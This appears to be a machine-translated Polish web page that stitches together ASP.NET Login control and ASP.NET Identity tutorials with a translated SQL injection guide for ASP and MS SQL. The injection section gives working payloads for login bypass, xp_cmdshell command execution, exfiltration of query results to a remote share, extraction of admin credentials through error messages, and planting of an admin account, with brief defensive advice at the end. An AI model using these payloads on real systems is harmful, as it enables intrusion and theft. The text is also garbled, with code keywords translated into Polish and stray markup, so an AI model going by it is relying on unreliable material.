Brzydkie logowanie asp. Serwer eus do pracy z kontami użytkowników. Co zrobić, jeśli nie znalazłeś strony, która używa danych wejściowych?

Patrząc na powyższy kod, pojawia się jedno pytanie: jeśli musisz napisać tak dużo kodu interfejsu użytkownika podczas dostosowywania szablonu (lub projektowania go w wizualnym designerze), dlaczego nie napisać własnej strony logowania bez użycia kontrolki Login?

To jest właściwe pytanie. Jednak, jak wyjaśniono wcześniej, część interfejsu jest tylko jedną częścią elementu Login. Na przykład w przypadku, gdy użytkownik kliknie przycisk logowania, formant logowania ma już cały niezbędny kod do automatycznego sprawdzania poprawności użytkownika względem magazynu członkostwa i przekierowywania użytkownika do oryginalnej strony, o którą prosili za pośrednictwem struktury uwierzytelniania formularzy. Więc zdecydowanie oszczędzisz sobie kłopotów z pisaniem tego kodu.

Dzięki odpowiednim kontrolkom i właściwym wartościom identyfikatorów dla tych kontrolek nie musisz pisać żadnego kodu obsługi zdarzeń. Kod działa w zwykły sposób, z wyjątkiem tego, że definiujesz zestaw kontrolek i ich układ. W rzeczywistości kontrolka logowania wymaga co najmniej dwóch pól tekstowych z identyfikatorami UserName i Password. Jeśli tych dwóch pól tekstowych brakuje (lub mają różne wartości identyfikatora), wówczas Login zgłosi wyjątek. Wszystkie inne kontrolki są opcjonalne, ale jeśli podasz odpowiednią wartość identyfikatora (na przykład Login dla przycisku logowania), Login automatycznie obsłuży ich zdarzenia i będzie zachowywał się tak, jak w przypadku zastosowania domyślnego układu.

W poniższej tabeli wymieniono wartości identyfikatorów specjalnych, wymagane dla nich typy elementów oraz flagę obowiązkową:

Kontrolka logowania może być dowolną kontrolką obsługującą propagację zdarzeń i właściwość CommandName. Ważne jest, aby ustawić właściwość CommandName tego elementu na Login, ponieważ w przeciwnym razie formant Login nie rozpozna go podczas obsługi zdarzenia. Jeśli nie dodasz kontrolki z właściwością CommandName ustawioną na Login, będziesz musiał samodzielnie obsłużyć zdarzenia i napisać odpowiedni kod, aby zweryfikować nazwę użytkownika i hasło oraz przekierować do pierwotnie żądanej strony.

Możesz także dodać kontrolki z innymi identyfikatorami, które w ogóle nie mają nic wspólnego z logowaniem. Powyższy kod używał elementów RequiredFieldValidator i RegularExpressionValidator do sprawdzania poprawności pól nazwy użytkownika i hasła.

Podczas korzystania z LayoutTemplate wiele właściwości natywnych dla kontrolki staje się niedostępnych. Po zastosowaniu szablonu dostępne są tylko następujące właściwości:

URL strony docelowej

Widoczne po zalogowaniu

• Dostawca członkostwa

Wszystkie właściwości stylu i kilka właściwości ustawiania zawartości tekstowej elementów domyślnych nie są już dostępne w Edytorze właściwości programu Visual Studio, ponieważ można je ręcznie dodać jako pojedyncze kontrolki lub tekst statyczny do szablonu elementu logowania. Jeśli dodasz je do elementu Login w trybie szablonu, zostaną po prostu zignorowane, ponieważ szablon zastępuje domyślny interfejs elementu Login, który używa tych właściwości.

Programowanie kontroli logowania

Kontrolka logowania obsługuje kilka zdarzeń i właściwości, których można użyć do dostosowania jego zachowania. Zapewniają pełną kontrolę nad dostrajaniem kontrolki logowania (wraz z innymi narzędziami dostosowywania, takimi jak szablony i właściwości stylu). Kontrolka logowania obsługuje zdarzenia wymienione w poniższej tabeli:

Pierwsze trzy zdarzenia mogą być obsługiwane w celu wykonania niektórych czynności przed uwierzytelnieniem użytkownika, po uwierzytelnieniu oraz w przypadku wystąpienia błędu podczas uwierzytelnienia. Na przykład zdarzenie LoginError może zostać użyte do automatycznego przekierowania użytkownika na stronę odzyskiwania hasła po określonej liczbie prób logowania, jak pokazano poniżej:

Protected void Page_Load(object sender, EventArgs e) ( if (!this.IsPostBack) ViewState["LoginErrors"] = 0; ) protected void Login1_LoginError(object sender, EventArgs e) ( // Jeśli stan LoginErrors nie istnieje, utwórz it if (ViewState["LoginErrors"] == null) ViewState["LoginErrors"] = 0; // Zwiększenie licznika nieudanych prób logowania int ErrorCount = (int)ViewState["LoginErrors"] + 1; ViewState["LoginErrors "] = ErrorCount ; // Sprawdź liczbę nieudanych prób, jeśli ((ErrorCount > 3) && (Login1.PasswordRecoveryUrl != string.Empty)) Response.Redirect(Login1.PasswordRecoveryUrl); )

Kontrola logowania odpala zdarzenia w kolejności pokazanej na poniższym rysunku:

Jak wspomniano wcześniej, jeśli przechwytujesz zdarzenie Uwierzytelnianie, musisz dodać własną nazwę użytkownika i kod weryfikacyjny hasła. Nieruchomość Uwierzytelniać utrzymuje wystąpienie listy parametrów AuthenticateEventArgs. Ta klasa argumentów zdarzenia obsługuje jedną właściwość o nazwie Authenticated. Jeśli ustawiono wartość true, formant logowania zakłada, że ​​uwierzytelnianie powiodło się i uruchamia zdarzenie LoggedIn. Jeśli ustawisz tę właściwość na wartość false, zostanie wyświetlony komunikat FailureText i zostanie zgłoszone zdarzenie LoginError:

Chronione void Login1_Authenticate(object sender, AuthenticateEventArgs e) ( if (Membership.ValidateUser(Login1.UserName, Login1.Password)) ( e.Authenticated = true; ) else ( e.Authenticated = false; ) )

Jak widać, istnieje bezpośredni dostęp do wprowadzonych wartości poprzez właściwości UserName i Password, które zawierają tekst wprowadzony w odpowiednich polach tekstowych. Jeśli używasz kontrolek szablonu i chcesz uzyskać wartość z innego elementu, oprócz elementów o identyfikatorach UserName i Password, możesz użyć metody FindControl(), aby uzyskać ten dodatkowy element. Ta metoda pobiera identyfikator żądanego elementu i zwraca wystąpienie System.Web.UI.Control. Wynikowy obiekt jest następnie po prostu rzutowany na typ żądanej kontrolki i odczytywana jest wartość wymagana przez niestandardową metodę weryfikacji tożsamości użytkownika.

Ostatnia aktualizacja: 31.10.2015

Wydanie ASP.NET MVC 5 oznaczało wydanie nowego systemu autoryzacji i uwierzytelniania w aplikacjach .NET o nazwie ASP.NET Identity. Ten system zastąpił dostawców Simple Membership, którzy zostali wprowadzeni w ASP.NET MVC 4.

Klikając przycisk Zmień uwierzytelnianie, możemy zmienić typ uwierzytelnienia, wybierając jedną z poniższych opcji:

Brak uwierzytelniania: tożsamość ASP.NET i brak wbudowanego systemu uwierzytelniania

Indywidualne konta użytkowników : Domyślnie projekt zawiera system ASP.NET Identity, który umożliwia autoryzację zarówno użytkowników w ramach aplikacji, jak i korzystanie z usług zewnętrznych, takich jak google, twitter itp.

Konta Organizacyjne: odpowiednie dla stron internetowych i aplikacji internetowych poszczególnych firm i organizacji

Uwierzytelnianie Windows: system uwierzytelniania dla intranetów korzystających z kont Windows

Zostawmy wartość domyślną, czyli Indywidualne Konta Użytkowników i utwórzmy projekt.

Stworzony projekt już domyślnie posiada całą infrastrukturę niezbędną do autoryzacji: modele, kontrolery, widoki. Jeśli zajrzymy do węzła References (Libraries), zobaczymy tam szereg bibliotek kluczy, które zawierają klasy niezbędne do autoryzacji i uwierzytelniania:

Jest to zestaw bibliotek OWIN, które dodają funkcjonalność OWIN do projektu, a także trzy biblioteki samej ASP.NET Identity:

Microsoft.AspNet.Identity.EntityFramework: zawiera klasy Entity Framework, które używają ASP.NET Identity i komunikują się z SQL Server

Microsoft.AspNet.Identity.Core: zawiera kilka kluczowych interfejsów ASP.NET Identity. Implementacja tych interfejsów pozwoli wyjść poza MS SQL Server i wykorzystać inne DBMS jako przechowywanie kont, w tym systemy NoSQL.

Microsoft.AspNet.Identity.OWIN: zapewnia uwierzytelnianie OWIN do aplikacji ASP.NET MVC przy użyciu tożsamości ASP.NET

Skoro cała infrastruktura jest już w projekcie, uruchommy projekt, na stronie wyświetlanej w przeglądarce znajdziemy link Zarejestrować i kliknij na niego. Na stronie rejestracji, która się otworzy, wprowadź dane:

Po rejestracji login zostanie wyświetlony w prawym górnym rogu strony internetowej aplikacji internetowej. Po rejestracji możemy się wylogować klikając na LogOff i zalogować się ponownie. W ten sposób możemy już zacząć korzystać z wbudowanego systemu uwierzytelniania w aplikacji ASP.NET MVC 5. Przyjrzyjmy się teraz jego głównym punktom.

Po pierwsze, gdzie to wszystko jest przechowywane? Gdzie trafiają dane zarejestrowanych użytkowników?

W takim przypadku stosuje się podejście Code First. Plik web.config ma już domyślne parametry połączenia, które określają katalog bazy danych. Jeśli rozwiniemy folder App_Data, zobaczymy utworzoną bazę danych:

Jeśli nagle baza danych nie jest widoczna w folderze, kliknij przycisk Pokaż wszystkie pliki u góry okna Eksploratora rozwiązań.

Możemy otworzyć tę bazę w oknie Server Explorer i zobaczyć jej zawartość:

Domyślnie podczas rejestracji pierwszego użytkownika tworzony jest następujący zestaw tabel:

MigrationHistory : używany przez EntityFramework do migracji baz danych

AspNetRoles : zawiera definicje ról

AspNetUserClaims : tabela zawierająca zestaw oświadczeń. Oświadczenie reprezentuje inny model autoryzacji w porównaniu do ról. Z grubsza rzecz biorąc, roszczenie zawiera pewne informacje o użytkowniku, takie jak adres e-mail, login, wiek itp. A te informacje pozwalają zidentyfikować użytkownika i nadać mu odpowiednie prawa dostępu.

AspNetUserLogins : tabela logowania użytkownika

AspNetUserRoles : tabela, która ustawia określone role dla użytkowników

AspNetUsers : sama tabela użytkowników. Jeśli go otworzymy, zobaczymy dane zarejestrowanego użytkownika

Kluczowymi jednostkami w AspNet Identity są użytkownicy i role. Cała funkcjonalność tworzenia, usuwania użytkowników, interakcji z repozytorium użytkowników jest przechowywana w klasie UserManager. Aby pracować z rolami i zarządzać nimi, AspNet Identity definiuje klasę RoleManager. Klasy UserManager i RoleManager znajdują się w bibliotece Microsoft.AspNet.Identity.Core.

Każdy użytkownik UserManager reprezentuje obiekt interfejsu IUser. Wszystkie operacje zarządzania użytkownikami są wykonywane za pośrednictwem magazynu reprezentowanego przez obiekt IUserStore.

Każda rola reprezentuje implementację interfejsu IRole, a role są zarządzane przez klasę RoleManager za pośrednictwem magazynu IRoleStore.

Bezpośrednią implementację interfejsów IUser, IRole, IUserStore i IRoleStore zapewnia przestrzeń nazw Microsoft.AspNet.Identity.EntityFramework:

Klasa IdentityUser jest implementacją interfejsu IUser. A klasa magazynu użytkownika — UserStore implementuje interfejs IUserStore.

Podobnie klasa IdentityRole implementuje interfejs IRole, a klasa magazynu ról RoleStore implementuje interfejs IRoleStore.

Aby współdziałać z bazą danych w przestrzeni nazw Microsoft.AspNet.Identity.EntityFramework, zdefiniowano klasę kontekstu IdentityDbContext

W aplikacji ASP.NET MVC nie będziemy pracować bezpośrednio z klasami IdentityUser i IdentityDbContext. Domyślnie plik jest dodawany do projektu w folderze Models IdentityModels.cs, który zawiera definicje klas użytkowników i kontekstu danych:

Klasa publiczna ApplicationUser: IdentityUser ( publiczne zadanie asynchroniczne GenerujUserIdentityAsync(UserManager) manager) ( var userIdentity = await manager.CreateIdentityAsync(this, DefaultAuthenticationTypes.ApplicationCookie); return userIdentity; ) ) public class ApplicationDbContext: IdentityDbContext ( public ApplicationDbContext() : base("DefaultConnection", throwIfV1Schema: false) ( ) publiczny statyczny ApplicationDbContext Create() ( zwróć nowy ApplicationDbContext(); ) )

W aplikacji nie pracujemy bezpośrednio z klasami IdentityUser i IdentityDbContext, ale mamy do czynienia z klasami pochodnymi.

Klasa ApplicationUser dziedziczy wszystkie właściwości z IdentityUser. Dodaje również metodę GenerateUserIdentityAsync() , która tworzy obiekt ClaimsIdentity przez wywołanie UserManager.CreateIdentityAsync . Ten obiekt zawiera informacje o tym użytkowniku.

Taka architektura pozwala wziąć gotową funkcjonalność i w razie potrzeby dodać nową, np. dodać nową właściwość dla użytkownika lub dodać nową tabelę do bazy danych.

Nie będę szczegółowo opisywał wszystkich funkcjonalności AspNet Identity, które są domyślnie dodawane do projektu, tylko pokrótce przedstawię tylko główne funkcje.

Po pierwsze, aby włączyć AspNet Identity, do projektu w folderze App_Start dodawane są dwa pliki. Plik Startup.Auth.cs zawiera klasę uruchamiania aplikacji OWIN. Ponieważ AspNet Identity używa infrastruktury OWIN, ta klasa jest jednym z kluczy i jest niezbędna do pracy.

Plik IdentityConfig.cs zawiera szereg dodatkowych klas pomocniczych: usługi do dwuskładnikowej walidacji za pomocą poczty e-mail i telefonu EmailService i SmsService , klasę menedżera użytkowników ApplicationUserManager, która dodaje szereg dodatkowych funkcji do UserManager , oraz klasę ApplicationSignInManager służącą do logowania i wylogowywania się z serwisu .

Podstawowa funkcjonalność systemu uwierzytelniania i zarządzania kontami znajduje się w dwóch kontrolerach: AccountController i ManageController

AccountController określa sposoby logowania, rejestracji, weryfikacji kodu wysłanego e-mailem lub SMS-em, resetowania hasła, przypomnienia hasła, logowania do serwisu za pomocą usług zewnętrznych. Kontroler ManageController służy do zarządzania kontem i oferuje możliwość zmiany hasła oraz zarządzania numerami telefonów w systemie. W przypadku obu kontrolerów wszystkie niezbędne widoki i specjalne modele widoków są już generowane domyślnie.

Pomimo tego, że domyślnie dysponujemy już gotową funkcjonalnością, to jednak w niektórych przypadkach, na przykład do wysłania SMS-a lub e-maila, wymagane są dodatkowe ustawienia. Przyjrzyjmy się teraz głównym punktom systemu AspNet Identity.

SQL Injection for Dummies, hack ASP+MSSQL

Aleksander Antipow

Ten artykuł nie zawiera żadnych nowych prawd, wstrzykiwanie SQL jest szeroko opisane i szeroko stosowane. Artykuł jest bardziej przeznaczony dla początkujących, ale być może profesjonaliści będą w stanie znaleźć jedną lub dwie nowe sztuczki.

Ten artykuł ma na celu pomóc początkującym w radzeniu sobie z problemami, jakie mogą napotkać podczas korzystania z techniki SQL Injection, z powodzeniem ją wykorzystywać i bronić się przed takimi atakami.

Wstęp

Kiedy interesujący serwer ma otwarty tylko port 80, a skaner luk w zabezpieczeniach nie może zgłosić niczego interesującego, a wiesz, że administrator systemu zawsze bardzo szybko łata serwer sieciowy, naszą ostatnią szansą jest włamanie do sieci. Wstrzyknięcie SQL to jeden z rodzajów hacków internetowych, który wykorzystuje tylko port 80 i może działać nawet z aktualnymi poprawkami. Atak ten jest bardziej skierowany na aplikacje internetowe (takie jak ASP, JSP, PHP, CGI itp.) niż bezpośrednio na serwer WWW lub usługi w systemie operacyjnym.

Ten artykuł nie zawiera żadnych nowych prawd, wstrzykiwanie SQL jest szeroko opisane i szeroko stosowane. Artykuł jest bardziej przeznaczony dla początkujących, ale być może profesjonaliści będą w stanie znaleźć jedną lub dwie nowe sztuczki. Polecam również sprawdzić linki na końcu tego artykułu, aby uzyskać więcej informacji od ekspertów w tej dziedzinie.

1.1 Co to jest wstrzykiwanie SQL?

SQL Injection to metoda wstrzykiwania zapytań/poleceń SQL za pośrednictwem stron internetowych. Wiele stron internetowych korzysta z parametrów prezentowanych użytkownikom sieci i wykonuje zapytanie SQL do bazy danych. Weźmy jako przykład logowanie użytkownika, gdzie istnieje strona internetowa z nazwą użytkownika i hasłem, a zapytanie SQL jest wykonywane w bazie danych, aby sprawdzić, czy istnieje zarejestrowany użytkownik z tą nazwą użytkownika i hasłem. Za pomocą SQL Injection możliwe jest przesłanie fikcyjnej nazwy użytkownika i/lub pola hasła, które zmienia zapytanie SQL, co może dostarczyć nam czegoś ciekawego.

2.0 Czego powinniśmy szukać

Spróbuj znaleźć strony, które proszą o dane, takie jak strona wyszukiwania, strona dyskusji itp. Czasami strony html używają metody POST do wysyłania poleceń do innej strony sieci Web. W takim przypadku nie zobaczysz parametrów w adresie URL. Jednak w tym przypadku możesz poszukać tagu „FORM” w źródle HTML stron. Znajdziesz coś takiego:

Wszystkie parametry pomiędzy

2.1 Co zrobić, jeśli nie znalazłeś strony, która używa danych wejściowych?

Poszukaj stron takich jak ASP, JSP, CGI lub PHP. Spróbuj znaleźć strony, które używają parametrów takich jak:

3.0. Jak mogę sprawdzić, czy to, co znalazłem, jest podatne na ataki?

Spróbuj zacząć od jednego cytatu. Wpisz następujący wiersz:

cześć" lub 1=1--

w polu nazwy użytkownika lub hasła, a nawet w parametrze adresu URL. Przykład:

Zaloguj się: cześć" lub 1=1--
Zdaj: cześć” lub 1=1--
http://duck/index.asp?id=hi” lub 1=1--

Jeśli zrobiłeś to z ukrytym polem, po prostu pobierz oryginalny kod HTML, zapisz go na dysku twardym, zmień odpowiednio adres URL i ukryte pole. Przykład:

Jeśli szczęście jest po Twojej stronie, zostaniesz zalogowany bez nazwy użytkownika lub hasła.

3.1 Ale dlaczego " lub 1=1--?

Spójrzmy na inny przykład, który wyjaśnia użyteczność konstrukcji „ lub 1=1--”. Oprócz ominięcia rejestracji, możemy również przyjrzeć się dodatkowym informacjom, które zwykle nie są dostępne. Rozważmy stronę asp, która łączy się z inną stroną z następujący adres URL:

http://kaczka/index.asp?category=jedzenie

W adresie URL „kategoria” to nazwa zmiennej, a „jedzenie” to wartość przypisana do tej zmiennej. W tym celu strona asp może zawierać następujący kod:

v_cat = request("kategoria")
sqlstr="SELECT * FROM product WHERE PCategory="" & v_cat & """
ustaw rs=conn.execute(sqlstr)

jak widać, nasza zmienna zostanie połączona z v_cat i tym samym zapytanie SQL powinno przybrać postać:

SELECT * FROM product WHERE PCategory="jedzenie"

To zapytanie powinno zwrócić zestaw zawierający co najmniej jeden wiersz pasujący do klauzuli WHERE, w tym przypadku „jedzenie”. Teraz zmieńmy adres URL w ten sposób:

http://duck/index.asp?category=jedzenie” lub 1=1--
SELECT * FROM product WHERE PCategory="jedzenie" lub 1=1--‘

To zapytanie zwróci wszystkie wiersze w tabeli produktów, niezależnie od tego, czy Pkategoria to „jedzenie”, czy nie. Podwójny myślnik "-" mówi MS SQL Server, aby zignorował resztę zapytania po pojedynczym cudzysłowie ("). Czasami można zastąpić podwójny myślnik ostrym "#".

Jeśli jednak używany jest serwer inny niż SQL lub nie możesz zignorować reszty zapytania, spróbuj:

" lub "a"="a

Teraz zapytanie SQL zmieni się w:

SELECT * FROM product WHERE PCategory="jedzenie" lub "a"="a"

To zapytanie zwróci ten sam wynik.

W zależności od aktualnego zapytania SQL może być konieczne wypróbowanie niektórych z tych możliwości:

" lub 1=1--
" lub 1=1--
lub 1=1--
" lub "a"="a
" lub "a"="a
") lub ("a"="a

4.0 Jak mogę zdalnie wykonywać polecenia za pomocą wstrzykiwania SQL?

Możliwość wpisania komendy SQL zazwyczaj oznacza, że ​​możemy wykonywać zapytania SQL do woli. Domyślna instalacja MS SQL Server działa z uprawnieniami systemowymi. Możemy wywołać wbudowane procedury, takie jak master..xp_cmdshell, aby zdalnie wykonać dowolne polecenia:

"; exec master..xp_cmdshell "ping 10.10.1.2" --

Spróbuj użyć podwójnych cudzysłowów ("), jeśli (") nie działa.

Średnik kończy bieżącą instrukcję SQL i umożliwia uruchamianie nowych poleceń SQL. Aby sprawdzić, czy polecenie się powiodło, możesz sprawdzić pakiety ICMP w 10.10.1.2, aby sprawdzić, czy zawierają one jakiekolwiek pakiety z serwera, którego dotyczy problem:

http://witryna/?ID=31610

Jeśli nie otrzymano żadnego żądania ping z serwera, a pojawi się komunikat o błędzie wskazujący na błąd uprawnień, możliwe, że administrator ograniczył dostęp użytkownika sieci Web do procedur przechowywanych.

5.0 Jak uzyskać wyniki zapytania SQL?

Możesz użyć sp_makewebtask, aby napisać swoje żądanie w HTML:

"; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Określony adres IP musi mieć folder „share” z dostępem dla wszystkich.

6.0 Jak pobrać dane z bazy danych za pomocą komunikatu o błędzie ODBC?

Możemy wykorzystać informacje z komunikatu o błędzie wygenerowanego przez SQL Server, aby uzyskać dowolne dane. Rozważmy na przykład następującą stronę:

http://duck/index.asp?id=10

Teraz spróbujemy połączyć liczbę całkowitą „10” z innym wierszem w bazie danych:

http://duck/index.asp?id=10 UNION SELECT TOP 1 NAZWA_TABELI Z INFORMATION_SCHEMA.TABLES--

Tabela systemowa INFORMATION_SCHEMA.TABLES zawiera informacje dotyczące wszystkich tabel na serwerze.

Pole TABLE_NAME zawiera oczywiście nazwę każdej tabeli w bazie danych. Została wybrana, ponieważ wiemy, że zawsze istnieje. Nasza prośba:

WYBIERZ TOP 1 NAZWA_TABELI Z INFORMACJI_SCHEMATU.TABEL--

To zapytanie zwróci imię w bazie danych. Kiedy UNION tę wartość ciągu do liczby całkowitej 10, MS SQL Server spróbuje przekonwertować ciąg nvarchar na liczbę całkowitą. Spowoduje to wyświetlenie błędu informującego, że nie można przekonwertować nvarchar na int. Serwer zgłosi następujący błąd:

Błąd składni podczas konwertowania wartości nvarchar "(!LANG:table1" to a column of data type int. !}
/index.asp, wiersz 5

Komunikat o błędzie zawiera informacje o wartości, której nie można przekonwertować na liczbę całkowitą. W tym przypadku otrzymaliśmy nazwę pierwszej tabeli - "table1".

Aby uzyskać następną nazwę tabeli, możemy użyć następującego zapytania:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME Z INFORMATION_SCHEMA.TABLES GDZIE NAZWA_TABELI NOT IN („table1”)--

Możemy również wyszukiwać dane za pomocą klawisza LIKE:

http://duck/index.asp?id=10 UNION SELECT TOP 1 NAZWA_TABELI Z INFORMATION_SCHEMA.TABLES GDZIE NAZWA_TABELI LIKE „%25login%25”--

Dostawca Microsoft OLE DB dla sterowników ODBC błąd „80040e07” Błąd składni podczas konwersji wartości nvarchar "(!LANG:admin_login" to a column of data type int. !} /index.asp, wiersz 5

Odpowiednia konstrukcja „%25login%25” zostanie zastąpiona przez %login% w SQL Server. W takim przypadku otrzymamy nazwę tabeli, która odpowiada kryterium „admin_login”.

6.1 Jak mogę uzyskać wszystkie nazwy kolumn w tabeli?

Możemy użyć tabeli INFORMATION_SCHEMA.COLUMNS, aby wyświetlić wszystkie nazwy kolumn w tabeli:

http://duck/index.asp?id=10 UNION SELECT TOP 1 NAZWA_KOLUMNY Z INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="admin_login"-

Dostawca Microsoft OLE DB dla sterowników ODBC błąd „80040e07”
Błąd składni podczas konwertowania wartości nvarchar "(!LANG:login_id" to a column of data type int. !}
/index.asp, wiersz 5

Teraz, gdy znamy nazwę pierwszej kolumny, możemy użyć NOT IN(), aby uzyskać nazwę następnej kolumny:

http://duck/index.asp?id=10 UNION SELECT TOP 1 NAZWA_KOLUMNY Z INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="admin_login" WHERE COLUMN_NAME NOT IN ("login_id")-

Dostawca Microsoft OLE DB dla sterowników ODBC błąd „80040e07”
Błąd składni podczas konwertowania wartości nvarchar "(!LANG:nazwa_logowania" to a column of data type int. !}
/index.asp, wiersz 5

Kontynuując, otrzymamy pozostałe nazwy kolumn, tj. "hasło", "szczegóły", aż otrzymamy następujący błąd.

http://duck/index.asp?id=10 UNION SELECT TOP 1 NAZWA_KOLUMNY FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="admin_login" WHERE COLUMN_NAME NOT IN ("login_id","login_name","password",details")--

Dostawca Microsoft OLE DB dla sterowników ODBC błąd „80040e14”
Pozycje ORDER BY muszą pojawić się na liście wyboru, jeśli instrukcja zawiera operator UNION.
/index.asp, wiersz 5

6.2. Jak pozyskujemy potrzebne nam dane?

Teraz, gdy zidentyfikowaliśmy kilka ważnych tabel, możemy użyć tej samej techniki do pobierania informacji z bazy danych.

Pobierzmy pierwszy login_name z tabeli „admin_login”:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Dostawca Microsoft OLE DB dla sterowników ODBC błąd „80040e07”
Błąd składni podczas konwertowania wartości nvarchar "(!LANG:neo" to a column of data type int. !}
/index.asp, wiersz 5

Teraz wiemy, że istnieje użytkownik admin o loginie „neo”. Na koniec możemy uzyskać hasło „neo”:

http://duck/index.asp?id=10 UNION SELECT TOP 1 hasło FROM admin_login gdzie login_name="neo"--

Dostawca Microsoft OLE DB dla sterowników ODBC błąd „80040e07”
Błąd składni podczas konwersji wartości nvarchar "(!LANG:m4trix" to a column of data type int. !}
/index.asp, wiersz 5

Teraz możemy zalogować się jako „neo” z hasłem „m4trix”.

6.3 Jak uzyskać wartość liczbową ciągu?

W opisanej powyżej metodzie istnieje ograniczenie. Nie otrzymamy komunikatu o błędzie, jeśli spróbujemy przekonwertować tekst składający się z liczby (tylko znaki z zakresu 0...9). Opiszemy teraz pobieranie hasła „31173” od użytkownika „trinity”:

http://duck/index.asp?id=10 UNION SELECT TOP 1 hasło FROM admin_login gdzie login_name="trinity"--

Prawdopodobnie otrzymamy błąd „Nie znaleziono strony”. Powodem jest to, że hasło „31173” zostanie przekonwertowane na liczbę, przed UNION z liczbą całkowitą (w naszym przypadku 10). Ponieważ będzie to poprawne wyrażenie UNION, SQL Server nie wygeneruje komunikatu o błędzie, a zatem nie będziemy mogli uzyskać wpisu numerycznego.

Aby rozwiązać ten problem, możemy dodać ciąg liczbowy z kilkoma literami na końcu, aby konwersja się nie powiodła. Zmienione żądanie:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b"%20morpheus") FROM admin_login gdzie login_name="trinity"--

Po prostu używamy znaku plus (+), aby dołączyć do hasła dowolny tekst (kodowanie ASSCII dla „+” = 0x2b) na końcu. Następnie dodamy „%20morpheus” na końcu aktualnego hasła. Więc nawet jeśli wartość hasła to „31173”, będzie to „31173 morpheus”. Poprzez ręczne wywołanie funkcji convert(), próbując przekonwertować „31173 morpheus” na liczbę całkowitą, SQL Server wyśle ​​komunikat o błędzie ODBC:

Dostawca Microsoft OLE DB dla sterowników ODBC błąd „80040e07”
Błąd składni podczas konwertowania wartości nvarchar "(!LANG:31173 morpheus" to a column of data type int. !}
/index.asp, wiersz 5

Teraz możemy zalogować się jako „trójca” z hasłem „31173”.

7.0 Jak modyfikować/wstawiać dane do bazy danych?

Po otrzymaniu nazw wszystkich kolumn w tabeli możemy zaktualizować (UPDATE) lub nawet wstawić (INSERT) nowy rekord do tabeli. Na przykład możemy zmienić hasło na „neo”:

http://kaczka/index.asp?id=10; UPDATE "admin_login" SET "hasło" = "newpas5" GDZIE login_name="neo--

Aby wstawić (INSERT) nowy rekord do bazy danych:

http://kaczka/index.asp?id=10; WSTAW W "admin_login" ("login_id", "login_name", "password", "details") WARTOŚCI (666, "neo2","newpas5","NA")--

Teraz będziemy mogli zalogować się jako „neo” z hasłem „newpas5”.

8.0 Jak uniknąć wstrzyknięcia SQL?

Filtruj znaki specjalne we wszystkich ciągach w:

Wszelkie dane wprowadzone przez użytkownika
- Parametry adresu URL
- Ciasteczka

W przypadku wartości liczbowych przekonwertuj je na liczby całkowite przed przekazaniem ich do zapytania SQL. Lub użyj ISNUMERIC, aby upewnić się, że jest to liczba całkowita.

Uruchom SQL Server jako użytkownik nieuprzywilejowany.

Usuń nieużywane procedury składowane: master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

Kontrolki logowania ASP.NET zapewniają niezawodne rozwiązanie logowania do aplikacji sieci Web ASP.NET bez konieczności programowania. Domyślnie kontrolki logowania integrują się z członkostwem ASP.NET i uwierzytelnianiem formularzy, aby pomóc zautomatyzować uwierzytelnianie użytkowników w witrynie sieci Web. Zapewnia gotowy do użycia interfejs użytkownika, który pyta użytkownika o nazwę użytkownika i hasło oraz oferuje przycisk Zaloguj się do logowania. Weryfikuje poświadczenia użytkownika względem członkostwa API i zawiera podstawową funkcję uwierzytelniania ods, taką jak przekierowanie z powrotem do pierwotnej żądanej strony w ograniczonym obszarze aplikacji po pomyślnym zalogowaniu.

Kontrolka logowania wyświetla interfejs użytkownika do uwierzytelniania użytkownika. Kontrolka logowania zawiera pola tekstowe dla nazwy użytkownika i hasła oraz pole wyboru, które pozwala użytkownikom wskazać, czy chcą, aby serwer przechowywał ich tożsamość przy użyciu członkostwa ASP.NET i był automatycznie uwierzytelniany przy następnym odwiedzeniu witryny.

Kontrolka logowania ma właściwości dostosowanego wyświetlania, dostosowanych wiadomości i łączy do innych stron, na których użytkownicy mogą zmienić swoje hasło lub odzyskać zapomniane hasło. Kontrolka logowania może być używana jako samodzielna kontrolka na stronie głównej lub głównej lub na dedykowanej stronie logowania. Jeśli używasz kontrolki logowania z członkostwem ASP.NET, nie musisz pisać kodu, aby przeprowadzić uwierzytelnianie. Jeśli jednak chcesz utworzyć własną logikę uwierzytelniania, możesz obsłużyć zdarzenie Authenticate kontrolki logowania i dodać niestandardowy kod uwierzytelniania.

Uwaga — Kontrolki logowania mogą nie działać poprawnie, jeśli metoda strony sieci Web ASP.NET zostanie zmieniona z POST (domyślna) na GET.

Za każdym razem, gdy użytkownik naciśnie przycisk Zaloguj się, formant automatycznie weryfikuje nazwę użytkownika i hasło przy użyciu funkcji członkostwa interfejsu API Membership.ValidateUse(), a następnie wywołuje FormAuthentication.redirectFromLoginPage(), jeśli weryfikacja zakończyła się pomyślnie. Wszystkie opcje w interfejsie użytkownika LoginControl wpływają na dane wejściowe dostarczane przez kontrolkę do tych metod. Na przykład kliknięcie pola wyboru „Zapamiętaj mnie następnym razem” powoduje przekazanie wartości true do parametru createPresistentCookie metody RedirectFromLoginPage(). W związku z tym FormAuthenticateModule tworzy trwały plik cookie.

Domyślnie dostępne są trzy zadania logowania.

• Autoformatowanie - możesz wybrać domyślne schematy.
• Konwertuj na szablon — możesz edytować zawartość Kontroli logowania.
• Administruj witryną — można skonfigurować narzędzia administracyjne witryny sieci Web, takie jak zabezpieczenia, aplikacja, dostawca.

3. "Login1" runat= "server" BackColor= "#F7F7DE" BorderColor= "#CCCC99" BorderStyle= "Solid" BorderWidth= "1px" Font-Names= "Verdana" Font-Size= "10pt" >